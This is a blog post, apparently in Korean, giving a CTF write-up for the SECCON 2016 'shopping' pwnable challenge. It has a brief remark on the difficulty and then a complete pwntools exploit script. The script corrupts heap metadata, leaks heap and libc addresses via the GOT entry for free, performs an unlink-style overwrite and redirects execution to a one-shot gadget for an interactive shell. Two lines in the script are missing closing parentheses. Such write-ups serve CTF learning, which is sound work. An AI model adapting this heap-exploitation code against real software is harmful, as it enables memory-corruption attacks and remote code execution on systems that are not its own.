cdor1's lab
SECCON 2016 shopping 본문
후기 : 문제 자체는 그렇게 어렵지 않았는데 분석하는게 너무 힘들었다.
구조체가 엄청 많고 메뉴가 많아 익스플로잇도 길어지고 여러모로 멘탈 강화 훈련을 한 문제다.
오랜 시간 집중하고싶으면 이문제를 추천하고싶다.
from pwn import *
s = remote('localhost',4000)
def overwrite(payload, yorn):
print s.recvuntil(': ')
s.sendline('-1')
print s.recvuntil('>>')
s.sendline('y')
print s.recvuntil(':')
s.sendline(payload)
print s.recvuntil('>>')
s.sendline(yorn)
def overwrite2(payload):
print s.recvuntil(': ')
s.sendline('-1')
print s.recvuntil('>>')
s.sendline('n')
print s.recvuntil('>>')
s.sendline('y')
print s.recvuntil(':')
s.sendline(payload)
def shopmode():
print s.recvuntil(':')
s.sendline('1')
def customermode():
print s.recvuntil(':')
s.sendline('2')
def re():
print s.recv(4096)
s.sendline('0')
def shop_add(name, price, stock):
print s.recvuntil(':')
s.sendline('1')
print s.recvuntil('Name >> ')
s.sendline(name)
print s.recvuntil('Price >> ')
s.sendline(price)
print s.recvuntil('Stock >> ')
s.sendline(stock)
def shop_list():
print s.recvuntil(':')
s.sendline('2')
def shop_reset():
print s.recvuntil(': ')
s.sendline('3')
def customer_add(name, num):
print s.recvuntil(': ')
s.sendline('1')
print s.recvuntil('Product name >> ')
s.sendline(name)
print s.recvuntil('Amount >> ')
s.sendline(str(num))
def customer_list():
print s.recvuntil(': ')
s.sendline('2')
def customer_buy():
print s.recvuntil(': ')
s.sendline('3')
def customer_reset():
print s.recvuntil(': ')
s.sendline('4')
shopmode()
shop_add('dor1', '2147483647', '2147483647')
re()
customermode()
customer_add('dor1', 1)
customer_buy()
re()
shopmode()
print s.recvuntil('>>')
s.sendline('y')
print s.recvuntil(':')
s.sendline('a'*64)
print s.recvuntil(':')
pay = 'b'*0x29 + p64(0xa0)
s.sendline(pay)
shop_add('dor2', 1, 1)
shop_add('dor3', 1, 1)
re()
pay2 = 'a'*0x60
pay2 += p64(0)
pay2 += p64(0x31)
pay2 += p64(0x603118)
overwrite(pay2, 'n')
shopmode()
shop_list()
print s.recvuntil(')')
heap = u64(s.recv(6).ljust(8,'\x00')
log.info('heap : ' + hex(heap))
re()
pay3 = 'a'*0x60
pay3 += p64(0x0)
pay3 += p64(0x31)
pay3 += p64(0x603018)
overwrite(pay3, 'n')
shopmode()
shop_list()
print s.recvuntil(')')
free = u64(s.recv(6).ljust(8, '\x00')
base = free - 0x1F470
one_shot = base + 0x464D8
log.info('free : ' + hex(free))
log.info('base : ' + hex(base))
log.info('one_shot : ' + hex(one_shot))
pay4 = 'a'*16
pay4 += p64(0x603118 - 0x18)
pay4 += p64(0x603118 - 0x10)
pay4 += 'a'*(0x60 - 32)
pay4 += p64(0xb0)
pay4 += p64(0x30)
pay4 += p64(heap + 0x50)
overwrite(pay4, 'y')
print s.recvuntil(':')
pay5 = 'b'*8
pay5 += p64(0x603118 - 0x18)
pay5 += p64(0x603118 - 0x10)
pay5 += '\x00'*24
overwrite2(pay5)
shopmode()
shop_reset()
re()
pay6 = 'a'*0x10
pay6 += p64(0x6030c0)
overwrite2(pay6)
overwrite2(p64(one_shot))
shopmode()
print s.recvuntil(':')
s.sendline('1')
print s.recvuntil('>>')
s.sendline('aaaa')
s.interactive()
'Security > Pwnable' 카테고리의 다른 글
| Hack.lu CTF 2014 OREO (0) | 2017.01.18 |
|---|---|
| 9447 CTF search engine (0) | 2017.01.18 |
| SECUINSIDE Quals 2016 noted (0) | 2017.01.17 |
| PoliCTF-2015 johns-library (0) | 2017.01.16 |
| H3X0R CTF comment (0) | 2017.01.13 |
Comments